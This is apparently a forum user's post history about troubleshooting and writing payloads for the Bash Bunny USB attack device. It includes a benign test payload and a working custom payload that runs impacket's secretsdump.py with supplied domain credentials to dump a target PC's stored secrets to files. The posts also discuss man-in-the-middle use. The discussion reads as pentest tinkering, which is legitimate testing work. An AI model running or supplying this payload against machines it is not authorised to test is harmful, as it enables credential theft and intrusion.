Altecheon

Active Members
  • Posts: 6
Posts posted by Altecheon

1. 1 minute ago, mrpmcfc said:

    I can ping the machine from the bunny, but if I run your script the TestOutput is empty.

    If the script returns blank, make sure that the GET function is in the extension folder of the library folder.

    If it isn't there, then make sure to put the newest repository on the bunny. It should have the extension.

2. Can you guys successfully connect to the BB through SSH with the IP 172.16.64.1? If so, see if you can ping the IP given to the machine; mine is usually 172.16.64.10. It should show via ifconfig or ipconfig in the respective operating system if the system is receiving an IP. An example payload of these in action is as follows.

    Quote

# System default payload: bring up Ethernet, capture what the target presents, record it
LED R SLOW
ATTACKMODE RNDIS_ETHERNET
GET TARGET_HOSTNAME
GET TARGET_IP
cd /
# create /temp on the bunny if it does not exist yet
if [ ! -d "temp" ]; then
   mkdir temp
fi
# write the values the payload saw so they can be inspected over SSH afterwards
echo "$TARGET_IP $TARGET_HOSTNAME" > /temp/TestOutput

This should create a file at /temp/ named TestOutput. To access it, log into the bunny and look for it:

    Quote

    cat /temp/TestOutput

I don't have my bunny at the moment to test the code, but you should be able to see what the payloads see. If you cannot access the bunny, make sure that your computer can correctly see the bunny (e.g. drivers found).

3. It is a custom payload using impacket at the old firmware location. It assumes that you know the domain/user and password to pull credentials from a PC. If the account is cached, it executes, but if not, it fails due to contacting the logon server. I have also figured out that the use of an @ or a colon in a password causes issues for the impacket code.

     

    Quote

USER=domain/Genericuser
PASS=GenericPassword

LED R SLOW
ATTACKMODE RNDIS_ETHERNET
GET TARGET_HOSTNAME
GET TARGET_IP

# if the target never received an IP, signal failure on the LED and stop
if [ -z "${TARGET_IP}" ]; then
    LED R 100
    exit 1
fi

cd /pentest/impacket/examples

# output directory for the dumped secrets
if [ ! -d "temp" ]; then
    mkdir temp
fi

# quote the target and paths so a hostname or password with spaces survives word splitting
python secretsdump.py "$USER:$PASS@$TARGET_IP" -outputfile "temp/$TARGET_HOSTNAME" > "temp/$TARGET_HOSTNAME.outputfile"
sync
LED G SLOW

     

4. I understand that part of the plan for the BB was man-in-the-middle attacks, which is why I am running into an issue with one of the payloads I am playing around with. In an enterprise environment the system, unless it's a laptop, may not cache credentials that you may have obtained. This being said, if the user is not currently logged into the machine or has not logged in for a while, the system will attempt to reach out to a logon server. If the BB is the route the system takes to reach the internet, then the computer will throw an error like this:

    Quote

    "SMB SessionError: STATUS_NO_LOGON_SERVERS(No logon servers are currently available to service the logon request.)"

All of that being said, I think a feature that may be helpful would be to allow for configuration of the Ethernet modes. This would allow you to set the connection to slower than most networks, or maybe having no connection to the internet. This would also help when you do not wish to interrupt internet connectivity for the device.

    I cannot say that you cannot configure this already, but I can say I do not know how to configure this and that I am curious as to how I would do this.
